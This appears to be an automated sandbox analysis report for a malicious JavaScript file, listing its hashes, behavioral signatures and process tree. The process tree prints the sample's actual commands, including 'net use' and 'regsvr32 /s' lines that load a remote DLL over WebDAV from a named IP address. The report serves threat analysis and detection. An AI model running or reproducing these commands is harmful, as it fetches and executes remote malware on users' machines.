Analysis
-
max time kernel
93s -
max time network
97s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
09-07-2024 06:03
Static task
static1
Behavioral task
behavioral1
Sample
2335478253155930819.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
2335478253155930819.js
Resource
win10v2004-20240704-en
General
-
Target
2335478253155930819.js
-
Size
5KB
-
MD5
002955be68807c970f57d24ad22e88b6
-
SHA1
907ba3d847aeb2f50c43d16b14ffb5f926f7050c
-
SHA256
48097f32070f8da978b66fee3bf3309526f84348971a5a5b550f47cc3b816766
-
SHA512
e42c629c4c3c18644483ecc87aaa7a45e1ceea4ccbb138aecdee71cecd126ee009c1478da422e11bcec70501494599020ad9ffaf1024842a9bbe0a19942cea04
-
SSDEEP
96:scSXa8NdjB2cPLQalb/WwFvYUmD8kw2mezwzuomnUskE:scMa42QLQalbxgPD8mmezwzuomnUskE
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4940 wrote to memory of 4364 4940 wscript.exe 82 PID 4940 wrote to memory of 4364 4940 wscript.exe 82 PID 4364 wrote to memory of 1796 4364 cmd.exe 85 PID 4364 wrote to memory of 1796 4364 cmd.exe 85 PID 4364 wrote to memory of 2460 4364 cmd.exe 86 PID 4364 wrote to memory of 2460 4364 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\2335478253155930819.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\2335478253155930819.js" "C:\Users\Admin\\psrnzi.bat" && "C:\Users\Admin\\psrnzi.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4364 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:1796
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\362.dll3⤵PID:2460
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5002955be68807c970f57d24ad22e88b6
SHA1907ba3d847aeb2f50c43d16b14ffb5f926f7050c
SHA25648097f32070f8da978b66fee3bf3309526f84348971a5a5b550f47cc3b816766
SHA512e42c629c4c3c18644483ecc87aaa7a45e1ceea4ccbb138aecdee71cecd126ee009c1478da422e11bcec70501494599020ad9ffaf1024842a9bbe0a19942cea04